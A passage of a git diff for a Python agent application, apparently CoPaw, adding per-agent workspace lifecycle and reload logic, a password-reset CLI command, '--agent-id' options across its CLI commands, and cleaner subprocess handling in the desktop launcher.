self._channel_manager: + try: + await self._channel_manager.stop_all() + logger.debug( + f"ChannelManager stopped for agent: {self.agent_id}", + ) + except Exception as e: + logger.warning( + f"Error stopping ChannelManager for agent " + f"{self.agent_id}: {e}", + ) + + # 3. Stop MCPClientManager + if self._mcp_manager: + try: + await self._mcp_manager.close_all() + logger.debug( + f"MCPClientManager stopped for agent: " f"{self.agent_id}", + ) + except Exception as e: + logger.warning( + f"Error stopping MCPClientManager for agent " + f"{self.agent_id}: {e}", + ) + + # 4. Stop MemoryManager + if self._memory_manager: + try: + await self._memory_manager.close() + logger.debug( + f"MemoryManager stopped for agent: " f"{self.agent_id}", + ) + except Exception as e: + logger.warning( + f"Error stopping MemoryManager for agent " + f"{self.agent_id}: {e}", + ) + + # 5. Clear ChatManager reference (no stop method) + if self._chat_manager: + self._chat_manager = None + logger.debug( + f"ChatManager cleared for agent: {self.agent_id}", + ) + + # 6. Stop Runner + if self._runner: + try: + await self._runner.stop() + logger.debug(f"Runner stopped for agent: {self.agent_id}") + except Exception as e: + logger.warning( + f"Error stopping Runner for agent {self.agent_id}: {e}", + ) + + self._started = False + logger.info(f"Workspace stopped: {self.agent_id}") + + async def reload(self): + """Reload agent instance (stop and start with fresh configuration).""" + logger.info(f"Reloading agent instance: {self.agent_id}") + self._config = None # Clear cached config + await self.stop() + await self.start() + logger.info(f"Agent instance reloaded: {self.agent_id}") + + async def _start_config_watchers(self): + """Start config watchers for hot-reload of agent.json changes.""" + try: + # Start AgentConfigWatcher for channels and heartbeat + if self._channel_manager or self._cron_manager: + from .agent_config_watcher import AgentConfigWatcher + + self._config_watcher = AgentConfigWatcher( + agent_id=self.agent_id, + workspace_dir=self.workspace_dir, + channel_manager=self._channel_manager, + cron_manager=self._cron_manager, + ) + await self._config_watcher.start() + + # Start MCPConfigWatcher for MCP client hot-reload + if self._mcp_manager: + from .mcp.watcher import MCPConfigWatcher + + def mcp_config_loader(): + """Load MCP config from agent.json.""" + agent_config = load_agent_config(self.agent_id) + return agent_config.mcp + + self._mcp_config_watcher = MCPConfigWatcher( + mcp_manager=self._mcp_manager, + config_loader=mcp_config_loader, + config_path=self.workspace_dir / "agent.json", + ) + await self._mcp_config_watcher.start() + + except Exception as e: + logger.warning( + f"Failed to start config watchers for agent " + f"{self.agent_id}: {e}", + ) + + async def _stop_config_watchers(self): + """Stop config watchers.""" + if self._config_watcher: + try: + await self._config_watcher.stop() + except Exception as e: + logger.warning( + f"Error stopping AgentConfigWatcher for agent " + f"{self.agent_id}: {e}", + ) + self._config_watcher = None + + if self._mcp_config_watcher: + try: + await self._mcp_config_watcher.stop() + except Exception as e: + logger.warning( + f"Error stopping MCPConfigWatcher for agent " + f"{self.agent_id}: {e}", + ) + self._mcp_config_watcher = None + + def __repr__(self) -> str: + """String representation of workspace.""" + status = "started" if self._started else "stopped" + return ( + f"Workspace(id={self.agent_id}, " + f"workspace={self.workspace_dir}, " + f"status={status})" + ) diff --git a/src/copaw/app/workspace_restart.py b/src/copaw/app/workspace_restart.py new file mode 100644 index 000000000..5f2f50f2a --- /dev/null +++ b/src/copaw/app/workspace_restart.py @@ -0,0 +1,66 @@ +# -*- coding: utf-8 -*- +"""Workspace-level restart logic. + +This module provides workspace-scoped restart functionality for the +/daemon restart command. Each workspace can reload its own components +(channels, cron, MCP) without affecting other workspaces. +""" +from __future__ import annotations + +import logging +from typing import TYPE_CHECKING + +if TYPE_CHECKING: + from .workspace import Workspace + +logger = logging.getLogger(__name__) + + +async def restart_workspace(workspace: "Workspace") -> None: + """Restart a single workspace's components (channels, cron, MCP). + + This function performs an in-process reload of workspace components: + 1. Reloads agent configuration from agent.json + 2. Calls workspace.reload() to restart managers + + Args: + workspace: The workspace instance to restart + + Raises: + Exception: If restart fails + """ + logger.info(f"Restarting workspace: {workspace.agent_id}") + + try: + # Reload the workspace (hot reload all managers) + await workspace.reload() + + logger.info( + f"Workspace restart completed: {workspace.agent_id}", + ) + + except Exception as e: + logger.exception( + f"Failed to restart workspace {workspace.agent_id}: {e}", + ) + raise + + +def create_restart_callback(workspace: "Workspace"): + """Create a restart callback for a workspace's runner. + + This creates a closure that captures the workspace instance and + provides it as a callback for the /daemon restart command. + + Args: + workspace: The workspace instance + + Returns: + Async callable that restarts the workspace + """ + + async def _restart_callback() -> None: + """Restart callback for runner.""" + await restart_workspace(workspace) + + return _restart_callback diff --git a/src/copaw/cli/auth_cmd.py b/src/copaw/cli/auth_cmd.py new file mode 100644 index 000000000..61235b055 --- /dev/null +++ b/src/copaw/cli/auth_cmd.py @@ -0,0 +1,66 @@ +# -*- coding: utf-8 -*- +from __future__ import annotations + +import secrets + +import click + +from ..app.auth import ( + _hash_password, + _load_auth_data, + _save_auth_data, + is_auth_enabled, +) + + +@click.group("auth", help="Manage web authentication.") +def auth_group() -> None: + """Manage web authentication.""" + + +@auth_group.command("reset-password") +def reset_password_cmd() -> None: + """Reset the password for the registered web user.""" + if not is_auth_enabled(): + click.echo( + "Authentication is not enabled.\n" + "Set COPAW_AUTH_ENABLED=true to enable it first.", + ) + return + + data = _load_auth_data() + + if data.get("_auth_load_error"): + raise click.ClickException( + "Failed to read auth data. Check auth.json for corruption.", + ) + + user = data.get("user") + if not user: + click.echo("No registered user found. Nothing to reset.") + return + + username = user.get("username", "") + click.echo(f"Resetting password for user: {username}") + + new_password = click.prompt( + "New password", + hide_input=True, + confirmation_prompt=True, + ) + + if not new_password or not new_password.strip(): + raise click.ClickException("Password cannot be empty.") + + pw_hash, salt = _hash_password(new_password) + data["user"]["password_hash"] = pw_hash + data["user"]["password_salt"] = salt + + # Invalidate existing tokens by rotating jwt_secret + data["jwt_secret"] = secrets.token_hex(32) + + _save_auth_data(data) + click.echo( + "✓ Password reset successfully. " + "All existing sessions have been invalidated.", + ) diff --git a/src/copaw/cli/channels_cmd.py b/src/copaw/cli/channels_cmd.py index 7c8a040e1..d682a4ee5 100644 --- a/src/copaw/cli/channels_cmd.py +++ b/src/copaw/cli/channels_cmd.py @@ -3,6 +3,7 @@ from __future__ import annotations from types import SimpleNamespace +from pathlib import Path import click @@ -21,6 +22,8 @@ IMessageChannelConfig, QQConfig, VoiceChannelConfig, + load_agent_config, + save_agent_config, ) from .utils import prompt_confirm, prompt_path, prompt_select from ..config import get_available_channels @@ -30,6 +33,7 @@ get_channel_registry, ) + # Fields that contain secrets — display masked in ``list`` _SECRET_FIELDS = { "bot_token", @@ -816,41 +820,51 @@ def _channel_enabled(ch) -> bool: @channels_group.command("list") -def list_cmd() -> None: +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) +def list_cmd(agent_id: str) -> None: """Show current channel configuration.""" - config_path = get_config_path() + try: + agent_config = load_agent_config(agent_id) + click.echo(f"Channels for agent: {agent_id}\n") - if not config_path.is_file(): - click.echo(f"Config not found: {config_path}") - click.echo("Will load default config.") - click.echo("Run `copaw channels config` to create one.") - cfg = load_config() - else: - cfg = load_config(config_path) - - extra = getattr(cfg.channels, "__pydantic_extra__", None) or {} - for key, name in _get_channel_names().items(): - ch = getattr(cfg.channels, key, None) - if ch is None: - ch = extra.get(key) - if ch is None: - continue - status = ( - click.style("enabled", fg="green") - if _channel_enabled(ch) - else click.style("disabled", fg="red") - ) - click.echo(f"\n{'─' * 40}") - click.echo(f" {name} [{status}]") - click.echo(f"{'─' * 40}") + if not agent_config.channels: + click.echo("No channels configured for this agent.") + return - for field_name, value in _channel_config_fields(ch): - display = ( - _mask(str(value)) if field_name in _SECRET_FIELDS else value + extra = ( + getattr(agent_config.channels, "__pydantic_extra__", None) or {} + ) + for key, name in _get_channel_names().items(): + ch = getattr(agent_config.channels, key, None) + if ch is None: + ch = extra.get(key) + if ch is None: + continue + status = ( + click.style("enabled", fg="green") + if _channel_enabled(ch) + else click.style("disabled", fg="red") ) - click.echo(f" {field_name:20s}: {display}") + click.echo(f"\n{'─' * 40}") + click.echo(f" {name} [{status}]") + click.echo(f"{'─' * 40}") + + for field_name, value in _channel_config_fields(ch): + display = ( + _mask(str(value)) + if field_name in _SECRET_FIELDS + else value + ) + click.echo(f" {field_name:20s}: {display}") - click.echo() + click.echo() + except ValueError as e: + click.echo(f"Error: {e}", err=True) + raise SystemExit(1) from e def _install_channel_to_dir( @@ -872,8 +886,6 @@ def _install_channel_to_dir( dest_dir = CUSTOM_CHANNELS_DIR / key if from_path: - from pathlib import Path - src = Path(from_path).resolve() if not src.exists(): click.echo(f"Path not found: {src}", err=True) @@ -1051,17 +1063,31 @@ def remove_cmd(key: str, keep_config: bool) -> None: @channels_group.command("config") -def configure_cmd() -> None: +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) +def configure_cmd(agent_id: str) -> None: """Interactively configure channels.""" - config_path = get_config_path() - working_dir = config_path.parent - - click.echo(f"Working dir: {working_dir}") - working_dir.mkdir(parents=True, exist_ok=True) - - existing = load_config(config_path) if config_path.is_file() else Config() + try: + agent_config = load_agent_config(agent_id) + click.echo(f"Configuring channels for agent: {agent_id}\n") + + # Create a temporary Config object for the interactive configurator + temp_config = Config() + temp_config.channels = ( + agent_config.channels + if agent_config.channels + else temp_config.channels + ) - configure_channels_interactive(existing) + configure_channels_interactive(temp_config) - save_config(existing, config_path) - click.echo(f"\n✓ Configuration saved to {config_path}") + # Save back to agent config + agent_config.channels = temp_config.channels + save_agent_config(agent_id, agent_config) + click.echo(f"\n✓ Configuration saved for agent {agent_id}") + except ValueError as e: + click.echo(f"Error: {e}", err=True) + raise SystemExit(1) from e diff --git a/src/copaw/cli/chats_cmd.py b/src/copaw/cli/chats_cmd.py index 2b1eea7bd..aa6b835dd 100644 --- a/src/copaw/cli/chats_cmd.py +++ b/src/copaw/cli/chats_cmd.py @@ -55,12 +55,18 @@ def chats_group() -> None: default=None, help="Override API base URL, e.g. http://127.0.0.1:8088", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def list_chats( ctx: click.Context, user_id: Optional[str], channel: Optional[str], base_url: Optional[str], + agent_id: str, ) -> None: """List all chats, optionally filtered by user_id or channel. @@ -78,7 +84,8 @@ def list_chats( if channel: params["channel"] = channel with client(base_url) as c: - r = c.get("/chats", params=params) + headers = {"X-Agent-Id": agent_id} + r = c.get("/chats", params=params, headers=headers) r.raise_for_status() print_json(r.json()) @@ -86,11 +93,17 @@ def list_chats( @chats_group.command("get") @click.argument("chat_id") @click.option("--base-url", default=None, help="Override API base URL") +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def get_chat( ctx: click.Context, chat_id: str, base_url: Optional[str], + agent_id: str, ) -> None: """View details of a specific chat (including message history). @@ -103,7 +116,8 @@ def get_chat( """ base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.get(f"/chats/{chat_id}") + headers = {"X-Agent-Id": agent_id} + r = c.get(f"/chats/{chat_id}", headers=headers) if r.status_code == 404: raise click.ClickException(f"chat not found: {chat_id}") r.raise_for_status() @@ -143,6 +157,11 @@ def get_chat( ), ) @click.option("--base-url", default=None, help="Override API base URL") +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def create_chat( ctx: click.Context, @@ -152,6 +171,7 @@ def create_chat( user_id: Optional[str], channel: str, base_url: Optional[str], + agent_id: str, ) -> None: """Create a new chat. @@ -189,7 +209,8 @@ def create_chat( "meta": {}, } with client(base_url) as c: - r = c.post("/chats", json=payload) + headers = {"X-Agent-Id": agent_id} + r = c.post("/chats", json=payload, headers=headers) r.raise_for_status() print_json(r.json()) @@ -198,12 +219,18 @@ def create_chat( @click.argument("chat_id") @click.option("--name", required=True, help="New chat name") @click.option("--base-url", default=None, help="Override API base URL") +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def update_chat( ctx: click.Context, chat_id: str, name: str, base_url: Optional[str], + agent_id: str, ) -> None: """Update chat name. @@ -215,10 +242,10 @@ def update_chat( copaw chats update --name "Renamed Chat" """ base_url = _base_url(ctx, base_url) - + headers = {"X-Agent-Id": agent_id} # Fetch existing spec, then patch name with client(base_url) as c: - r = c.get("/chats") + r = c.get("/chats", headers=headers) r.raise_for_status() specs = r.json() @@ -229,7 +256,7 @@ def update_chat( payload["name"] = name with client(base_url) as c: - r = c.put(f"/chats/{chat_id}", json=payload) + r = c.put(f"/chats/{chat_id}", json=payload, headers=headers) if r.status_code == 404: raise click.ClickException(f"chat not found: {chat_id}") r.raise_for_status() @@ -239,11 +266,17 @@ def update_chat( @chats_group.command("delete") @click.argument("chat_id") @click.option("--base-url", default=None, help="Override API base URL") +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def delete_chat( ctx: click.Context, chat_id: str, base_url: Optional[str], + agent_id: str, ) -> None: """Delete a specific chat. @@ -258,7 +291,8 @@ def delete_chat( """ base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.delete(f"/chats/{chat_id}") + headers = {"X-Agent-Id": agent_id} + r = c.delete(f"/chats/{chat_id}", headers=headers) if r.status_code == 404: raise click.ClickException(f"chat not found: {chat_id}") r.raise_for_status() diff --git a/src/copaw/cli/cron_cmd.py b/src/copaw/cli/cron_cmd.py index 3a8d573b5..6dd230ec5 100644 --- a/src/copaw/cli/cron_cmd.py +++ b/src/copaw/cli/cron_cmd.py @@ -42,12 +42,22 @@ def cron_group() -> None: "If omitted, uses global --host and --port from config." ), ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context -def list_jobs(ctx: click.Context, base_url: Optional[str]) -> None: +def list_jobs( + ctx: click.Context, + base_url: Optional[str], + agent_id: str, +) -> None: """List all cron jobs. Output is JSON from GET /cron/jobs.""" base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.get("/cron/jobs") + headers = {"X-Agent-Id": agent_id} + r = c.get("/cron/jobs", headers=headers) r.raise_for_status() print_json(r.json()) @@ -59,12 +69,23 @@ def list_jobs(ctx: click.Context, base_url: Optional[str]) -> None: default=None, help="Override the API base URL. Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context -def get_job(ctx: click.Context, job_id: str, base_url: Optional[str]) -> None: +def get_job( + ctx: click.Context, + job_id: str, + base_url: Optional[str], + agent_id: str, +) -> None: """Fetch a cron job by ID. Returns JSON from GET /cron/jobs/.""" base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.get(f"/cron/jobs/{job_id}") + headers = {"X-Agent-Id": agent_id} + r = c.get(f"/cron/jobs/{job_id}", headers=headers) if r.status_code == 404: raise click.ClickException("Job not found.") r.raise_for_status() @@ -78,16 +99,23 @@ def get_job(ctx: click.Context, job_id: str, base_url: Optional[str]) -> None: default=None, help="Override the API base URL. Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def job_state( ctx: click.Context, job_id: str, base_url: Optional[str], + agent_id: str, ) -> None: """Get the runtime state of a cron job (e.g. next run time, paused).""" base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.get(f"/cron/jobs/{job_id}/state") + headers = {"X-Agent-Id": agent_id} + r = c.get(f"/cron/jobs/{job_id}/state", headers=headers) if r.status_code == 404: raise click.ClickException("Job not found.") r.raise_for_status() @@ -237,8 +265,11 @@ def _build_spec_from_cli( ) @click.option( "--timezone", - default="UTC", - help="Timezone for the cron schedule (e.g. UTC, America/New_York).", + default=None, + help=( + "Timezone for the cron schedule (e.g. UTC, America/New_York). " + "Defaults to the user timezone from config." + ), ) @click.option( "--enabled/--no-enabled", @@ -259,6 +290,11 @@ def _build_spec_from_cli( default=None, help="Override the API base URL. Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def create_job( ctx: click.Context, @@ -270,10 +306,11 @@ def create_job( target_user: Optional[str], target_session: Optional[str], text: Optional[str], - timezone: str, + timezone: Optional[str], enabled: bool, mode: str, base_url: Optional[str], + agent_id: str, ) -> None: """Create a cron job. @@ -281,6 +318,10 @@ def create_job( --channel, --target-user, --target-session and --text to define the job inline. """ + if timezone is None: + from ..config import load_config + + timezone = load_config().user_timezone or "UTC" base_url = _base_url(ctx, base_url) if file_ is not None: payload = json.loads(file_.read_text(encoding="utf-8")) @@ -310,7 +351,8 @@ def create_job( mode=mode, ) with client(base_url) as c: - r = c.post("/cron/jobs", json=payload) + headers = {"X-Agent-Id": agent_id} + r = c.post("/cron/jobs", json=payload, headers=headers) r.raise_for_status() print_json(r.json()) @@ -322,16 +364,23 @@ def create_job( default=None, help="Override the API base URL. Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def delete_job( ctx: click.Context, job_id: str, base_url: Optional[str], + agent_id: str, ) -> None: """Permanently delete a cron job. The job is removed from the server.""" base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.delete(f"/cron/jobs/{job_id}") + headers = {"X-Agent-Id": agent_id} + r = c.delete(f"/cron/jobs/{job_id}", headers=headers) if r.status_code == 404: raise click.ClickException("Job not found.") r.raise_for_status() @@ -345,18 +394,25 @@ def delete_job( default=None, help="Override the API base URL. Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def pause_job( ctx: click.Context, job_id: str, base_url: Optional[str], + agent_id: str, ) -> None: """Pause a cron job so it no longer runs on schedule. Use 'resume' to re-enable. """ base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.post(f"/cron/jobs/{job_id}/pause") + headers = {"X-Agent-Id": agent_id} + r = c.post(f"/cron/jobs/{job_id}/pause", headers=headers) if r.status_code == 404: raise click.ClickException("Job not found.") r.raise_for_status() @@ -370,16 +426,23 @@ def pause_job( default=None, help="Override the API base URL. Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context def resume_job( ctx: click.Context, job_id: str, base_url: Optional[str], + agent_id: str, ) -> None: """Resume a paused cron job so it runs again on its schedule.""" base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.post(f"/cron/jobs/{job_id}/resume") + headers = {"X-Agent-Id": agent_id} + r = c.post(f"/cron/jobs/{job_id}/resume", headers=headers) if r.status_code == 404: raise click.ClickException("Job not found.") r.raise_for_status() @@ -393,12 +456,23 @@ def resume_job( default=None, help="Override the API base URL. Defaults to global --host/--port.", ) +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) @click.pass_context -def run_job(ctx: click.Context, job_id: str, base_url: Optional[str]) -> None: +def run_job( + ctx: click.Context, + job_id: str, + base_url: Optional[str], + agent_id: str, +) -> None: """Trigger a one-off run of a cron job immediately (ignores schedule).""" base_url = _base_url(ctx, base_url) with client(base_url) as c: - r = c.post(f"/cron/jobs/{job_id}/run") + headers = {"X-Agent-Id": agent_id} + r = c.post(f"/cron/jobs/{job_id}/run", headers=headers) if r.status_code == 404: raise click.ClickException("Job not found.") r.raise_for_status() diff --git a/src/copaw/cli/daemon_cmd.py b/src/copaw/cli/daemon_cmd.py index 446b3e4cd..aa621f283 100644 --- a/src/copaw/cli/daemon_cmd.py +++ b/src/copaw/cli/daemon_cmd.py @@ -6,6 +6,7 @@ from __future__ import annotations import asyncio +from pathlib import Path import click @@ -18,11 +19,26 @@ run_daemon_version, ) from ..constant import WORKING_DIR +from ..config import load_config -def _context() -> DaemonContext: +def _get_agent_workspace(agent_id: str) -> Path: + """Get agent workspace directory.""" + try: + config = load_config() + if agent_id in config.agents.profiles: + ref = config.agents.profiles[agent_id] + workspace_dir = Path(ref.workspace_dir).expanduser() + return workspace_dir + except Exception: + pass + return WORKING_DIR + + +def _context(agent_id: str) -> DaemonContext: + working_dir = _get_agent_workspace(agent_id) return DaemonContext( - working_dir=WORKING_DIR, + working_dir=working_dir, memory_manager=None, restart_callback=None, ) @@ -34,30 +50,54 @@ def daemon_group() -> None: @daemon_group.command("status") -def status_cmd() -> None: +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) +def status_cmd(agent_id: str) -> None: """Show daemon status (config, working dir, memory manager).""" - ctx = _context() + ctx = _context(agent_id) + click.echo(f"Agent: {agent_id}\n") click.echo(run_daemon_status(ctx)) @daemon_group.command("restart") -def restart_cmd() -> None: +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) +def restart_cmd(agent_id: str) -> None: """Print restart instructions (CLI has no process to restart).""" - ctx = _context() + ctx = _context(agent_id) + click.echo(f"Agent: {agent_id}\n") click.echo(asyncio.run(run_daemon_restart(ctx))) @daemon_group.command("reload-config") -def reload_config_cmd() -> None: +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) +def reload_config_cmd(agent_id: str) -> None: """Reload config (re-read from file).""" - ctx = _context() + ctx = _context(agent_id) + click.echo(f"Agent: {agent_id}\n") click.echo(run_daemon_reload_config(ctx)) @daemon_group.command("version") -def version_cmd() -> None: +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) +def version_cmd(agent_id: str) -> None: """Show version and paths.""" - ctx = _context() + ctx = _context(agent_id) + click.echo(f"Agent: {agent_id}\n") click.echo(run_daemon_version(ctx)) @@ -69,8 +109,14 @@ def version_cmd() -> None: type=int, help="Number of last lines to show (default 100).", ) -def logs_cmd(lines: int) -> None: +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) +def logs_cmd(lines: int, agent_id: str) -> None: """Tail last N lines of WORKING_DIR/copaw.log.""" - ctx = _context() + ctx = _context(agent_id) lines = min(max(1, lines), 2000) + click.echo(f"Agent: {agent_id}\n") click.echo(run_daemon_logs(ctx, lines=lines)) diff --git a/src/copaw/cli/desktop_cmd.py b/src/copaw/cli/desktop_cmd.py index d637137ff..7aa5a29f3 100644 --- a/src/copaw/cli/desktop_cmd.py +++ b/src/copaw/cli/desktop_cmd.py @@ -1,24 +1,30 @@ # -*- coding: utf-8 -*- """CLI command: run CoPaw app on a free port in a native webview window.""" +# pylint:disable=too-many-branches,too-many-statements,consider-using-with from __future__ import annotations +import logging import os import socket import subprocess import sys import threading import time +import traceback import webbrowser import click from ..constant import LOG_LEVEL_ENV +from ..utils.logging import setup_logger try: import webview except ImportError: webview = None # type: ignore[assignment] +logger = logging.getLogger(__name__) + class WebViewAPI: """API exposed to the webview for handling external links.""" @@ -52,12 +58,6 @@ def _wait_for_http(host: str, port: int, timeout_sec: float = 300.0) -> bool: return False -def _log_desktop(msg: str) -> None: - """Print to stderr and flush (for desktop.log when launched from .app).""" - print(msg, file=sys.stderr) - sys.stderr.flush() - - def _stream_reader(in_stream, out_stream) -> None: """Read from in_stream line by line and write to out_stream. @@ -106,11 +106,13 @@ def desktop_cmd( native webview window loading that URL. Use for a dedicated desktop window without conflicting with an existing CoPaw app instance. """ + # Setup logger for desktop command (separate from backend subprocess) + setup_logger(log_level) port = _find_free_port(host) url = f"http://{host}:{port}" click.echo(f"Starting CoPaw app on {url} (port {port})") - _log_desktop("[desktop] Server subprocess starting...") + logger.info("Server subprocess starting...") env = os.environ.copy() env[LOG_LEVEL_ENV] = log_level @@ -118,18 +120,21 @@ def desktop_cmd( if "SSL_CERT_FILE" in env: cert_file = env["SSL_CERT_FILE"] if os.path.exists(cert_file): - _log_desktop(f"[desktop] SSL certificate: {cert_file}") + logger.info(f"SSL certificate: {cert_file}") else: - _log_desktop( - f"[desktop] WARNING: SSL_CERT_FILE set but not found: " - f"{cert_file}", + logger.warning( + f"SSL_CERT_FILE set but not found: {cert_file}", ) else: - _log_desktop("[desktop] WARNING: SSL_CERT_FILE not set") + logger.warning("SSL_CERT_FILE not set on environment") is_windows = sys.platform == "win32" + proc = None + manually_terminated = ( + False # Track if we intentionally terminated the process + ) try: - with subprocess.Popen( + proc = subprocess.Popen( [ sys.executable, "-m", @@ -148,7 +153,8 @@ def desktop_cmd( env=env, bufsize=1, universal_newlines=True, - ) as proc: + ) + try: if is_windows: stdout_thread = threading.Thread( target=_stream_reader, @@ -162,11 +168,9 @@ def desktop_cmd( ) stdout_thread.start() stderr_thread.start() - _log_desktop("[desktop] Waiting for HTTP ready...") + logger.info("Waiting for HTTP ready...") if _wait_for_http(host, port): - _log_desktop( - "[desktop] HTTP ready, creating webview window...", - ) + logger.info("HTTP ready, creating webview window...") api = WebViewAPI() webview.create_window( "CoPaw Desktop", @@ -176,36 +180,90 @@ def desktop_cmd( text_select=True, js_api=api, ) - _log_desktop( - "[desktop] Calling webview.start() " - "(blocks until closed)...", + logger.info( + "Calling webview.start() (blocks until closed)...", ) webview.start( private_mode=False, ) # blocks until user closes the window - _log_desktop( - "[desktop] webview.start() returned (window closed).", + logger.info("webview.start() returned (window closed).") + else: + logger.error("Server did not become ready in time.") + click.echo( + "Server did not become ready in time; open manually: " + + url, + err=True, ) - proc.terminate() - proc.wait() - return # normal exit after user closed window - _log_desktop("[desktop] Server did not become ready in time.") - click.echo( - "Server did not become ready in time; open manually: " + url, - err=True, + try: + proc.wait() + except KeyboardInterrupt: + pass # will be handled in finally + finally: + # Ensure backend process is always cleaned up + # Wrap all cleanup operations to handle race conditions: + # - Process may exit between poll() and terminate() + # - terminate()/kill() may raise ProcessLookupError/OSError + # - We must not let cleanup exceptions mask the original error + if proc and proc.poll() is None: # process still running + logger.info("Terminating backend server...") + manually_terminated = ( + True # Mark that we're intentionally terminating + ) + try: + proc.terminate() + try: + proc.wait(timeout=5.0) + logger.info("Backend server terminated cleanly.") + except subprocess.TimeoutExpired: + logger.warning( + "Backend did not exit in 5s, force killing...", + ) + try: + proc.kill() + proc.wait() + logger.info("Backend server force killed.") + except (ProcessLookupError, OSError) as e: + # Process already exited, which is fine + logger.debug( + f"kill() raised {e.__class__.__name__} " + f"(process already exited)", + ) + except (ProcessLookupError, OSError) as e: + # Process already exited between poll() and terminate() + logger.debug( + f"terminate() raised {e.__class__.__name__} " + f"(process already exited)", + ) + elif proc: + logger.info( + f"Backend already exited with code {proc.returncode}", + ) + + # Only report errors if process exited unexpectedly + # (not manually terminated) + # On Windows, terminate() doesn't use signals so exit codes vary + # (1, 259, etc.) + # On Unix/Linux/macOS, terminate() sends SIGTERM (exit code -15) + # Using a flag is more reliable than checking specific exit codes + if proc and proc.returncode != 0 and not manually_terminated: + logger.error( + f"Backend process exited unexpectedly with code " + f"{proc.returncode}", ) - try: - proc.wait() - except KeyboardInterrupt: - proc.terminate() - proc.wait() - - if proc.returncode != 0: - sys.exit(proc.returncode or 1) + # Follow POSIX convention for exit codes: + # - Negative (signal): 128 + signal_number + # - Positive (normal): use as-is + # Example: -15 (SIGTERM) -> 143 (128+15), -11 (SIGSEGV) -> + # 139 (128+11) + if proc.returncode < 0: + sys.exit(128 + abs(proc.returncode)) + else: + sys.exit(proc.returncode or 1) + except KeyboardInterrupt: + logger.warning("KeyboardInterrupt in main, cleaning up...") + raise except Exception as e: - _log_desktop(f"[desktop] Exception: {e!r}") - import traceback - + logger.error(f"Exception: {e!r}") traceback.print_exc(file=sys.stderr) sys.stderr.flush() raise diff --git a/src/copaw/cli/init_cmd.py b/src/copaw/cli/init_cmd.py index ace9dca3a..9934d362b 100644 --- a/src/copaw/cli/init_cmd.py +++ b/src/copaw/cli/init_cmd.py @@ -25,6 +25,7 @@ ) from ..constant import HEARTBEAT_DEFAULT_EVERY from ..providers import ProviderManager +from ..constant import WORKING_DIR SECURITY_WARNING = """ Security warning — please read. @@ -140,6 +141,9 @@ def init_cmd( accept_security: bool, ) -> None: """Create working dir with config.json and HEARTBEAT.md (interactive).""" + from pathlib import Path + from ..app.migration import ensure_default_agent_exists + config_path = get_config_path() working_dir = config_path.parent heartbeat_path = get_heartbeat_query_path() @@ -184,6 +188,14 @@ def init_cmd( else: mark_telemetry_collected(working_dir) + # --- Ensure default agent workspace exists --- + click.echo("\n=== Default Workspace Initialization ===") + ensure_default_agent_exists() + click.echo("✓ Default workspace initialized") + + # Get default workspace path for subsequent operations + default_workspace = Path(f"{WORKING_DIR}/workspaces/default").expanduser() + # --- config.json --- write_config = True if config_path.is_file() and not force and not use_defaults: @@ -242,6 +254,11 @@ def init_cmd( existing = ( load_config(config_path) if config_path.is_file() else Config() ) + # Ensure agents.defaults exists + if existing.agents.defaults is None: + from ..config.config import AgentsDefaultsConfig + + existing.agents.defaults = AgentsDefaultsConfig() existing.agents.defaults.heartbeat = hb # --- show_tool_details --- @@ -262,6 +279,32 @@ def init_cmd( ) existing.agents.language = language + # --- audio mode selection --- + if not use_defaults: + audio_mode = prompt_choice( + "Select audio mode for voice messages:\n" + " auto - transcribe if provider available, else file placeholder\n" + " native - send audio directly to model (needs ffmpeg)\n" + "Audio mode:", + options=["auto", "native"], + default=existing.agents.audio_mode, + ) + existing.agents.audio_mode = audio_mode + + # --- transcription provider type selection --- + if not use_defaults and audio_mode != "native": + provider_type = prompt_choice( + "Select transcription provider:\n" + " disabled - no transcription\n" + " whisper_api - remote Whisper API endpoint\n" + " local_whisper - locally installed openai-whisper\n" + " (requires ffmpeg + openai-whisper)\n" + "Provider:", + options=["disabled", "whisper_api", "local_whisper"], + default=existing.agents.transcription_provider_type, + ) + existing.agents.transcription_provider_type = provider_type + # --- channels (interactive when not --defaults) --- if not use_defaults and prompt_confirm( "Configure channels? " @@ -306,6 +349,7 @@ def init_cmd( click.echo("Enabling all skills by default (skip existing)...") synced, skipped = sync_skills_to_working_dir( + workspace_dir=default_workspace, skill_names=None, force=False, ) @@ -328,6 +372,7 @@ def init_cmd( click.echo("Enabling all skills...") synced, skipped = sync_skills_to_working_dir( + workspace_dir=default_workspace, skill_names=None, 